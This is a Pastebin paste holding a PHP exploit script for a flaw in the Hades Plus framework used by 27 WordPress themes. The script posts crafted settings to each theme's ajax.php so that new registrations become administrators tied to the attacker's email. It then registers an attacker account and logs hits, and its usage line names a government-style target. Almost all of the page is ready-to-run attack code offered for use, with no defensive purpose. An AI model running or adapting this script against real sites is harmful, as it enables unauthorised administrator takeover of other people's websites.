Googleinurl

[EXPLOIT]=> Wordpress -Hades Plus Add ADM / INURL - BRASIL

Sep 18th, 2014
2,101
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2. /*
  3. ----------------------------------------------------------
  4. *NAME*: Wordpress -Hades Plus Add ADM / INURL - BRASIL
  5. *TIPE*: User improper inclusion
  6. *Tested on*: Linux
  7. *EXECUTE*: php exploit.php http://www.target.us you@mail.com
  8. *OUTPUT*: 0day_Hades_Plus_Framework_Add_Administrator.txtt
  9. *AUTOR*: Cleiton Pinheiro / NICK: GoogleINURL
  10. *EMAIL*: inurllbr@gmail.com
  11. *Blog*: http://blog.inurl.com.br
  12. *Twitter*: https://twitter.com/googleinurl
  13. *Fanpage*: https://fb.com/InurlBrasil
  14. *GIT*: https://github.com/googleinurl
  15. *YOUTUBE* https://www.youtube.com/channel/UCFP-WEzs5Ikdqw0HBLImGGA
  16. *PACKETSTORMSECURITY:* http://packetstormsecurity.com/user/googleinurl/
  17. ----------------------------------------------------------
  18.  
  19. *Description:*
  20. This exploit allows an attacker to add new users through the /hades_framework/option_panel/ajax.php way sending request post completed.
  21. This failure is in bristle web 27 Themas:
  22. appius,Consultant,appius1,archin,averin,dagda,echea,felici,GantiDengantema,kmp,kmp2,themanya,liberal,liberal-media-bias,linguini,livewire,majestics,mathis,mazine,
  23. Orchestra, shopsum, shotzz, test, Viteeo, vithy, yvora, sodales.
  24. ----------------------------------------------------------
  25.  
  26. *Usage Information:*
  27. php exploit.php http://www.target.gov.us you@mail.com
  28.  
  29. Logic:
  30. $ params ['email'] = 'you_email';
  31. $ params ['user'] = 'inurlbrasil';
  32.  
  33. EXPLOIT POST:
  34. values[0][name]=users_can_register&values[0][value]=1&values[1][name]=admin_email&values[1][value]={$params['email']}&values[2][name]=default_role&values[2][value]=administrator&action=save;
  35.  
  36. if (result the requisition == success) {
  37. is a possible vulnerable and sent one Feedback activation of inurlbrasil usuraio.
  38. }
  39. ----------------------------------------------------------
  40. */
  41. error_reporting(1);
  42. set_time_limit(0);
  43. ini_set('display_errors', 1);
  44. ini_set('max_execution_time', 0);
  45. ini_set('allow_url_fopen', 1);
  46. ob_implicit_flush(true);
  47. ob_end_flush();
  48.  
  49. $params = array();
  50.  
  51. $params['email'] = $argv[2];
  52. $params['user'] = 'inurlbrasil';
  53. $params['post'] = "values%5B0%5D%5Bname%5D=users_can_register&values%5B0%5D%5Bvalue%5D=1&values%5B1%5D%5Bname%5D=admin_email&values%5B1%5D%5Bvalue%5D={$params['email']}&values%5B2%5D%5Bname%5D=default_role&values%5B2%5D%5Bvalue%5D=administrator&action=save";
  54.  
  55. $corpo = file_get_contents($argv[1]);
  56. !(preg_match_all("#\b((((ht|f)tps?://*)|(www|ftp)\.)[a-zA-Z0-9-\.]+)#i", $argv[1], $alvo_)) ? exit('0x[ERROR]: DEFINA URL') : NULL;
  57.  
  58. preg_match_all("#WordPress (.*?)/>#", $alvo_[0][0], $version);
  59. $str = str_replace('/>', '', $version[0]);
  60. $str = str_replace('"', '', $str);
  61. $users = file_get_contents("{$alvo_[0][0]}/?author=1");
  62. preg_match('/<title>(.*?)<\/title>/si', $users, $user);
  63. $wpuser = explode('|', $user[1]);
  64. $headers = get_headers($argv[1], 1);
  65. print "\r\n0x[EXPLOIT NAME]: WordPress 0day - Hades Plus Framework Add Administrator / INURL - BRASIL";
  66. print "\n--------------------------------------------------------------------------------------------------";
  67. print "\n0x[INFO]: ";
  68. print $headers[0] . (isset($headers[1]) ? ' -> ' . $headers[1] : NULL);
  69. print "\n0x[INFO]: ";
  70. is_array($headers['Server']) ? print_r($headers['Server'][0]) : print_r($headers['Server']);
  71. print "\n0x[INFO]: ";
  72. is_array($headers['X-Pingback']) ? print_r($headers['X-Pingback'][0]) : print_r($headers['X-Pingback']);
  73. print "\n0x[INFO]: ";
  74. is_array($headers['X-Powered-By']) ? print_r($headers['X-Powered-By'][0]) : print_r($headers['X-Powered-By']);
  75. print "\n0x[INFO]: TARGET: {$alvo_[0][0]} | WP USER: " . str_replace("\n", '', $wpuser[0]) . " | VERSION: {$str} \n";
  76.  
  77.  
  78. __request($alvo_[0][0], '/wp-content/themes/appius/hades_framework/option_panel/ajax.php', $params);
  79. __request($alvo_[0][0], '/wp-content/themes/Consultant/hades_framework/option_panel/ajax.php', $params);
  80. __request($alvo_[0][0], '/wp-content/themes/appius1/hades_framework/option_panel/ajax.php', $params);
  81. __request($alvo_[0][0], '/wp-content/themes/archin/hades_framework/option_panel/ajax.php', $params);
  82. __request($alvo_[0][0], '/wp-content/themes/averin/hades_framework/option_panel/ajax.php', $params);
  83. __request($alvo_[0][0], '/wp-content/themes/dagda/hades_framework/option_panel/ajax.php', $params);
  84. __request($alvo_[0][0], '/wp-content/themes/echea/hades_framework/option_panel/ajax.php', $params);
  85. __request($alvo_[0][0], '/wp-content/themes/felici/hades_framework/option_panel/ajax.php', $params);
  86. __request($alvo_[0][0], '/wp-content/themes/GantiDengantema/hades_framework/option_panel/ajax.php', $params);
  87. __request($alvo_[0][0], '/wp-content/themes/kmp/hades_framework/option_panel/ajax.php', $params);
  88. __request($alvo_[0][0], '/wp-content/themes/kmp2/hades_framework/option_panel/ajax.php', $params);
  89. __request($alvo_[0][0], '/wp-content/themes/themanya/hades_framework/option_panel/ajax.php', $params);
  90. __request($alvo_[0][0], '/wp-content/themes/liberal/hades_framework/option_panel/ajax.php', $params);
  91. __request($alvo_[0][0], '/wp-content/themes/liberal-media-bias/hades_framework/option_panel/ajax.php', $params);
  92. __request($alvo_[0][0], '/wp-content/themes/linguini/hades_framework/option_panel/ajax.php', $params);
  93. __request($alvo_[0][0], '/wp-content/themes/livewire/hades_framework/option_panel/ajax.php', $params);
  94. __request($alvo_[0][0], '/wp-content/themes/majestics/hades_framework/option_panel/ajax.php', $params);
  95. __request($alvo_[0][0], '/wp-content/themes/mathis/hades_framework/option_panel/ajax.php', $params);
  96. __request($alvo_[0][0], '/wp-content/themes/mazine/hades_framework/option_panel/ajax.php', $params);
  97. __request($alvo_[0][0], '/wp-content/themes/Orchestra/hades_framework/option_panel/ajax.php', $params);
  98. __request($alvo_[0][0], '/wp-content/themes/shopsum/hades_framework/option_panel/ajax.php', $params);
  99. __request($alvo_[0][0], '/wp-content/themes/shotzz/hades_framework/option_panel/ajax.php', $params);
  100. __request($alvo_[0][0], '/wp-content/themes/test/hades_framework/option_panel/ajax.php', $params);
  101. __request($alvo_[0][0], '/wp-content/themes/Viteeo/hades_framework/option_panel/ajax.php', $params);
  102. __request($alvo_[0][0], '/wp-content/themes/vithy/hades_framework/option_panel/ajax.php', $params);
  103. __request($alvo_[0][0], '/wp-content/themes/yvora/hades_framework/option_panel/ajax.php', $params);
  104. __request($alvo_[0][0], '/wp-content/themes/sodales/hades_framework/option_panel/ajax.php', $params);
  105.  
  106. function __request($url, $plugin, $params) {
  107.  
  108.     $objcurl = curl_init();
  109.     curl_setopt($objcurl, CURLOPT_URL, $url . $plugin);
  110.     curl_setopt($objcurl, CURLOPT_RETURNTRANSFER, 1);
  111.     curl_setopt($objcurl, CURLOPT_HEADER, 0);
  112.     curl_setopt($objcurl, CURLOPT_HTTPHEADER, array(
  113.         'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0',
  114.         'Accept: application/json, text/javascript, */*; q=0.01',
  115.         'X-Requested-With: XMLHttpRequest',
  116.         "Referer: {$url}",
  117.         'Accept-Language: en-US,en;q=0.5',
  118.         'Cookie: bb_lastvisit=1400483408; bb_lastactivity=0;'
  119.     ));
  120.     curl_setopt($objcurl, CURLOPT_REFERER, $url . $plugin);
  121.     curl_setopt($objcurl, CURLOPT_POSTFIELDS, $params['post']);
  122.  
  123.     $corpo = curl_exec($objcurl);
  124.     curl_close($objcurl);
  125.  
  126.     if (strstr($corpo, 'success')) {
  127.  
  128.         $res = "\n--------------------------------------------------------------------------------------------------------------------------------------------------------------------\n0x[INFO][VULN]: [ " . date("d-m-Y H:i:s") . " ]\n";
  129.         $res.= "\n0x[INFO][VULN]: {$url}{$plugin} - RETURN=> [ {$corpo} ] / {$params['user']}, EMAIL=> " . urldecode($params['email']);
  130.         $res.= "\n--------------------------------------------------------------------------------------------------------------------------------------------------------------------\n";
  131.         print $res;
  132.         $admin['post'] = urlencode("user_login={$params['user']}&user_email={$params['email']}&redirect_to=&wp-submit=Inscription");
  133.         (strstr($corpo, 'success') ? __request($url, '/wp-login.php?action=register', $admin) : NULL);
  134.         file_put_contents('0day_Hades_Plus_Framework_Add_Administrator.txt', "{$res}\n", FILE_APPEND);
  135.     } else {
  136.         print (($plugin != '/wp-login.php?action=register') ?  "\n0x[INFO][NOT VULN]: {$url}{$plugin} "  : NULL);
  137.     }
  138. }
RAW Paste Data

Adblocker detected! Please consider disabling it...

We've detected AdBlock Plus or some other adblocking software preventing Pastebin.com from fully loading.

We don't have any obnoxious sound, or popup ads, we actively block these annoying types of ads!

Please add Pastebin.com to your ad blocker whitelist or disable your adblocking software.

×